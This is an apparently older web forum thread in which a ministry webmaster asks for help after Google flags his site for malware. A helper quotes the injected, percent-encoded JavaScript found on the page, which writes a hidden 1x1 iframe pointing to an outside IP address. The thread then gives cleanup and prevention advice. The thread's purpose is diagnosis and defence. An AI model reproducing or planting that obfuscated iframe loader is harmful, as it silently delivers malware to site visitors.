Hello members,
I hope you guys can help with suggestions and/or your own experiences.

A couple of days ago we received an email with the subject line, "Malware notification regarding cyuministries.org " from Google.

The entire Email reads like this:

Dear site owner or webmaster of cyuministries.org,

We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on
Google.com.
Below is an example URL on your site which can cause users to be
infected (space inserted to prevent accidental clicking in case your
mail client auto-links URLs):

http://www.cyuministries .org/

Here is a link to a sample warning page:
http://www.google.com/interstitial?url= … tries.org/

We strongly encourage you to investigate this immediately to protect
your visitors. Although some sites intentionally distribute malicious
software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious
advertiser

If your site was compromised, it's important to not only remove the
malicious (and usually hidden) content from your pages, but to also
identify and fix the vulnerability. We suggest contacting your hosting
provider if you are unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites:
http://www.stopbadware.org/home/security

Once you've secured your site, you can request that the warning be
removed by visiting http://www.stopbadware.org/home/review and
requesting a review. StopBadware and Google will jointly investigate
and reply to you with our findings. If your site is no longer harmful
to users, we will remove the warning.

Now when we requested a review from stopbadware.org this was our response

Thank you for contacting StopBadware.org.  We are currently
re-reviewing a number of websites via our appeals process, and we have added your
site to the bottom of that testing queue.  If this is the first appeal
for your site, you can expect a reply from us within 10 business days. 
Subsequent appeals may take significantly longer.

Answers to commonly asked questions from site owners who are being
filtered by Google can be found at: 
http://stopbadware.org/home/faq#partnerfiltering.

The StopBadware Team

This is so rediculous that it's almost funny. Well my wife is laughing just because of the nature of the warning, but I am very irritated. Our Ministry has nothing to hide, no secret codes in our website, and cannot seem to get anywhere. 

Share your knowledge please.
Rev Ron.
CYU

Our Ministry has nothing to hide, no secret codes in our website

Oh yeah ?

see the code that looks like this on your page ?

<script language="javascript"> document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); </script>

you need to remove it - it  loads a virus on Internet Explorer

Thanks so much for this.  We removed it  right away.  Do you know what is it and how someone could have put it there?  Do you know how we can protect ourselves from this issue in the future?
Any information would be very helpful.

God bless you for taking the time to answer.

Rev. Ron

well most likely your home computer that you made the page with has a virus and it infected Front Page that you used to make the page, but once you've been hacked you can't assume that everything is ok on your server either.

what you need to do is start by getting an updated virus scanner if you don't already have one, and scanning your computer so that you know that its clean.   AVG antivirus is free and it detected the virus on your page right away.

then download your infected pages and remove the offending javascript using something other than FrontPage, otherwise you're likely to just get infected all over again.  Front page uses Internet Explorer's functionality for its HTML view, so if you view the page in FrontPage you're going to be right back where you started.

In the long term, why not throw Front Page in the garbage can ?  Its more trouble than its worth, which unfortunately you found out the hard way. Might as well stop using Internet Explorer while you're at it - thats how these infections occur - took me a few minutes to find your problem since by not using Internet Explorer I was immune.  Mozilla Firefox is the safest webbrowser around.  No point in messing around with broken Web Browsers like Internet Explorer that get you infected with viruses.

Then also, you can't rule out that your webhost is compromised, so contact your webhosting company and let them know whats happened to you so they can check your webhosting machine out and make sure its clean.  Might also consider a different host cause once a box is compromised, if you don't own it you can't really honestly trust it. 

But my suspicion is that your webhost has not been compromised, just your home PC that you're making the pages with.

oh and as to what it is... that javascript writes and iframe on your page, that iframe loads another iframe which in turn loads the Virus...  here is some info about the virus it loads
http://secunia.com/virus_information/10530/agent-av/

Thank you for such detailed information.  Let me sleep and then read this post again..it's a lot to swallow and 1:15 AM.

I really appreciate your time,
Blessings to you!
Rev. Ron

Hey Mut

You should also point out it may be time to move to some form of Linux for their page making. I have switched to Freespire looks pretty nice.
You would be very wise to do what Mut said